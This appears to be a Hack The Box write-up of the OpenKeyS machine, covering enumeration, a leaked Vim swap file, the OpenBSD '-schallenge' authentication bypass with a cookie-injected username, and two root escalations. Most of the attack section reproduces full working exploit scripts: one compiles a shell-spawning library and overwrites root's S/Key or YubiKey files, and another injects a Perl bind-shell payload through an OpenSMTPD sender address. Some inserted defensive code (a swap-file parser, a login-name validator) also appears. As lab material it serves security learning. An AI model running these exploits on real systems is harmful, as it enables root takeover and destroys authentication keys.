HTB OpenkeyS Writeup

Enumeration

nmap -sC -sV 10.10.10.199

Ports 22 (SSH) and 80 (HTTP) are open. Browsing to the web server, we can see the page is redirected to http://10.10.10.199/index.php

The first thing I saw was the website title

OpenKeyS – Retrieve your OpenSSH Keys

Tried SQLi here but couldn’t find anything, so I thought of trying something else and quickly ran Dirb on it.
Dirb found a directory: http://10.10.10.199/includes/

Here we can see 2 files:
auth.php –> has nothing in it
auth.php.swp –> this is interesting, let’s download it.
Checking the file contents:

The user name jennifer caught my eye, and I saved it in my notes; maybe there’s a user with this name on the machine.
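As an added example (not part of the original writeup), here is a small parser for the header of a Vim swap file. It shows why a leaked .swp in a web root is worth flagging: block 0 records the editing user's name, the host name and the original file path, which is exactly how the user name above leaked. The field layout follows Vim's struct block0 (memline.c); the sample header and the values in it are constructed here, not taken from the box.

```python
import struct

# Layout of Vim's swap-file "block 0" header (struct block0 in Vim's memline.c):
# 2-byte id "b0", 10-byte version string, four 4-byte integers (page size,
# mtime, inode, pid), then NUL-padded user name (40), host name (40) and the
# original file name (900). These fields are what a leaked .swp gives away.
B0_UNAME_SIZE, B0_HNAME_SIZE, B0_FNAME_SIZE = 40, 40, 900
B0_HEADER_LEN = 2 + 10 + 4 * 4 + B0_UNAME_SIZE + B0_HNAME_SIZE + B0_FNAME_SIZE


def _cstr(raw: bytes) -> str:
    """Decode a NUL-padded fixed-width field."""
    return raw.split(b"\x00", 1)[0].decode("utf-8", errors="replace")


def parse_vim_swap_header(data: bytes) -> dict:
    """Return the identifying fields disclosed by a Vim swap file's block 0."""
    if len(data) < B0_HEADER_LEN or data[:2] != b"b0":
        raise ValueError("not a Vim swap file: missing 'b0' block-0 id")
    version = _cstr(data[2:12])
    if not version.startswith("VIM"):
        raise ValueError(f"unexpected version field: {version!r}")
    # Vim stores these in host byte order; little-endian assumed (x86/amd64).
    page_size, mtime, ino, pid = struct.unpack("<4I", data[12:28])
    user = _cstr(data[28:68])      # b0_uname: who was editing
    host = _cstr(data[68:108])     # b0_hname: on which host
    fname = _cstr(data[108:1008])  # b0_fname: original path of the edited file
    return {"version": version, "page_size": page_size, "mtime": mtime,
            "inode": ino, "pid": pid, "user": user, "host": host, "file": fname}


def build_sample_swap_header(user: str, host: str, fname: str, version: str = "VIM 8.1",
                             page_size: int = 4096, mtime: int = 0, ino: int = 0,
                             pid: int = 0) -> bytes:
    """Constructed block-0 header for offline testing (not a real capture)."""
    def field(s: str, size: int) -> bytes:
        return s.encode()[:size].ljust(size, b"\x00")
    return (b"b0" + field(version, 10) + struct.pack("<4I", page_size, mtime, ino, pid)
            + field(user, B0_UNAME_SIZE) + field(host, B0_HNAME_SIZE)
            + field(fname, B0_FNAME_SIZE))


if __name__ == "__main__":
    # Constructed sample (host name and path are placeholders, not from the box).
    sample = build_sample_swap_header("jennifer", "openkeys", "/var/www/htdocs/includes/auth.php")
    for key, value in parse_vim_swap_header(sample).items():
        print(f"{key:>9}: {value}")
```

On a real file, `strings auth.php.swp | head` shows the same three fields right after the `b0VIM` marker.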

I’ve read somewhere that .swp files can be recovered with vim:
vim -r auth.php.swp
Now we have 59 lines of code:

<?php
function authenticate($username, $password)
{
    $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);
    system($cmd, $retcode);
    return $retcode;
}

function is_active_session()
{
    // Session timeout in seconds
    $session_timeout = 300;

    // Start the session
    session_start();

    // Is the user logged in? 
    if(isset($_SESSION["logged_in"]))
    {
        // Has the session expired?
        $time = $_SERVER['REQUEST_TIME'];
        if (isset($_SESSION['last_activity']) && 
            ($time - $_SESSION['last_activity']) > $session_timeout)
        {
            close_session();
            return False;
        }
        else
        {
            // Session is active, update last activity time and return True
            $_SESSION['last_activity'] = $time;
            return True;
        }
    }
    else
    {
        return False;
    }
}

function init_session()
{
    $_SESSION["logged_in"] = True;
    $_SESSION["login_time"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR'];
    $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT'];
    $_SESSION["username"] = $_REQUEST['username'];
}

function close_session()
{
    session_unset();
    session_destroy();
    session_start();
}


?>

I saw the path /auth_helpers/check_auth in the file, but that’s a rabbit hole, so let’s skip that part.
I was stuck here for a long time, then I thought of googling what I had so far:

  • There’s something related to Openssh (After reading the website title)
  • The machine is based on OpenBSD
  • A login page and files related to “auth”

I made some searches with keywords like “OpenBSD auth exploit” and “PHP OpenBSD auth exploit”.
Both searches pointed towards an article about an OpenBSD Authentication Bypass and Local Privilege Escalation.

Foothold

CVE-2019-19521

OpenBSD Authentication Bypass and Local Privilege Escalation Vulnerabilities

Basically, if an attacker specifies the username ‘-schallenge’ or ‘-schallenge:passwd’ (to force passwd-style auth), it leads to a successful authentication bypass.
I tried this and it worked.

The Authentication Bypass worked, but we’re not greeted with an SSH key.
This is because we have to specify the username to get the SSH keys.
While reading the contents of auth.php.swp we found a username in it: *jennifer*.
Sometimes there are multiple parameters in the Cookie header separated by semicolons, but the problem is how to pass the user jennifer.

From past CTF experience I tried the following things:
  • Tried decoding the PHPSESSID value to get the algorithm (didn’t work)
  • Tried encoding the user in base64 and passing that (failed again)
  • Tried passing 'username=jennifer' in plaintext (worked)

'Cookie: PHPSESSID=emaf9tcrvqpujc32q6vu8edn6g;username=jennifer'

Now I have the SSH key for the user jennifer.
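As an added defender-side example (not code from the page or the box), here is how a web tier could validate a login name before handing it to an external auth helper, so that option-like values such as ‘-schallenge’ are rejected and never reach the helper; the helper path and the argv construction are assumptions, whereas the auth.php recovered above builds one shell string with escapeshellcmd(), which is what lets such a username through.

```python
import re
import subprocess

# Login names passed to an auth helper must never look like command-line
# options: CVE-2019-19521 is triggered by the name "-schallenge", which the
# OpenBSD login helpers parse as their "-s" (auth style) option rather than
# as a user name. The pattern below is the POSIX portable login-name set.
LOGIN_NAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def validate_login_name(name: str) -> tuple:
    """Return (accepted, reason) for a user-supplied login name."""
    if not name:
        return False, "empty"
    if name.startswith("-"):
        return False, "option-like: leading dash"
    if any(ch.isspace() for ch in name):
        # escapeshellcmd() does not quote spaces, so a name containing
        # whitespace would be split into several arguments by the shell.
        return False, "contains whitespace"
    if not LOGIN_NAME_RE.fullmatch(name):
        return False, "characters outside the portable login-name set"
    return True, "ok"


def build_check_auth_argv(helper: str, username: str, password: str) -> list:
    """Build an argv list (no shell involved) for the helper, rejecting bad names.

    `helper` is an assumed path; the page's helper is ../auth_helpers/check_auth.
    """
    ok, reason = validate_login_name(username)
    if not ok:
        raise ValueError(f"refusing login name {username!r}: {reason}")
    return [helper, username, password]


def run_check_auth(helper: str, username: str, password: str) -> int:
    """Invoke the helper without a shell; its exit code is the auth result."""
    argv = build_check_auth_argv(helper, username, password)
    return subprocess.run(argv, check=False).returncode


if __name__ == "__main__":
    # The names this writeup discusses, plus a normal one, classified:
    for name in ["jennifer", "-schallenge", "-schallenge:passwd", "jen nifer"]:
        print(f"{name!r:22} -> {validate_login_name(name)}")
```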

SSH as user jennifer

Privilege Escalation

While reading the Secpod article about the Authentication Bypass, I saw 3 other exploits for the same OpenBSD version.

CVE-2019-19522: Local privilege escalation via S/Key and YubiKey

A quick Google search landed me on this GitHub repository. It doesn’t have a separate exploit for this one, so I opened up the code for CVE-2019-19520 in the repository and saw that the author had combined 2 exploits in one script:

  • CVE-2019-19520: Local privilege escalation via xlock
  • CVE-2019-19522: Local privilege escalation via S/Key and YubiKey

echo "openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)"

echo "[*] checking system ..."

if grep auth= /etc/login.conf | fgrep -Ev "^#" | grep -q yubikey ; then
  echo "[*] system supports YubiKey authentication"
  target='yubikey'
elif grep auth= /etc/login.conf | fgrep -Ev "^#" | grep -q skey ; then
  echo "[*] system supports S/Key authentication"
  target='skey'
  if ! test -d /etc/skey/ ; then
    echo "[-] S/Key authentication enabled, but has not been initialized"
    exit 1
  fi
else
  echo "[-] system does not support S/Key / YubiKey authentication"
  exit 1
fi

echo "[*] id: `id`"

echo "[*] compiling ..."

cat > swrast_dri.c << "EOF"
#include <paths.h>
#include <sys/types.h>
#include <unistd.h>
static void __attribute__ ((constructor)) _init (void) {
    gid_t rgid, egid, sgid;
    if (getresgid(&rgid, &egid, &sgid) != 0) _exit(__LINE__);
    if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);
    char * const argv[] = { _PATH_KSHELL, NULL };
    execve(argv[0], argv, NULL);
    _exit(__LINE__);
}
EOF

cc -fpic -shared -s -o swrast_dri.so swrast_dri.c
rm -rf swrast_dri.c

echo "[*] running Xvfb ..."

display=":66"

env -i /usr/X11R6/bin/Xvfb $display -cc 0 &

echo "[*] testing for CVE-2019-19520 ..."

group=$(echo id -gn | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display)

if [ "$group" = "auth" ]; then
  echo "[+] success! we have auth group permissions"
else
  echo "[-] failed to acquire auth group permissions"
  exit 1
fi

# uncomment to drop to a shell with auth group permissions
#env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display ; exit

echo
echo "WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C)."
echo
sleep 5

if [ "$target" = "skey" ]; then
  echo "[*] trying CVE-2019-19522 (S/Key) ..."
  echo "rm -rf /etc/skey/root ; echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root ; chmod 0600 /etc/skey/root" | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display
  rm -rf swrast_dri.so
  echo "Your password is: EGG LARD GROW HOG DRAG LAIN"
  env -i TERM=vt220 su -l -a skey
fi

if [ "$target" = "yubikey" ]; then
  echo "[*] trying CVE-2019-19522 (YubiKey) ..."
  echo "rm -rf /var/db/yubikey/root.* ; echo 32d32ddfb7d5 > /var/db/yubikey/root.uid ; echo 554d5eedfd75fb96cc74d52609505216 > /var/db/yubikey/root.key" | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display
  rm -rf swrast_dri.so
  echo "Your password is: krkhgtuhdnjclrikikklulkldlutreul"
  env -i TERM=vt220 su -l -a yubikey
fi

Running the exploit

openkeys$ nano priv.sh
openkeys$ chmod +x priv.sh

openkeys$ ./priv.sh

ROOTED!!!

Alternative

There’s another exploit in the same repository which is again a Local Privilege Escalation.

payload="/tmp/.payload"

/bin/echo "OpenBSD 6.6 OpenSMTPD 6.6 local root exploit (CVE-2020-7247)"

/bin/echo "[*] id: `id`"

/bin/echo "[*] checking system ..."

if [ -w `dirname $payload` ]; then
  /bin/echo "[*] directory $payload is writable"
else
  /bin/echo "[-] directory $payload is not writable"
  exit 1
fi

if syspatch -l | grep -q 019_smtpd_exec ; then
  /bin/echo "[-] 019_smtpd_exec patch has been installed"
  exit 1
else
  /bin/echo "[*] 019_smtpd_exec patch has not been installed"
fi

/bin/echo "[*] writing payload to $payload ..."
cat > $payload << "EOF"
#!/bin/sh
perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,1337,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'
EOF
/bin/chmod +x $payload

/bin/echo "[*] executing $payload ..."
/bin/echo | /usr/sbin/sendmail -v -f "<;$payload;#@>" `whoami`

/bin/sleep 1

/bin/echo "[*] cleaning up $payload ..."
/bin/rm $payload

/bin/echo "[*] connecting to 127.0.0.1:1337 ..."
nc -v 127.0.0.1 1337

Running the exploit

openkeys$ nano privesc.sh
openkeys$ chmod +x privesc.sh

openkeys$ ./privesc.sh

Again we are root

Thanks for Reading
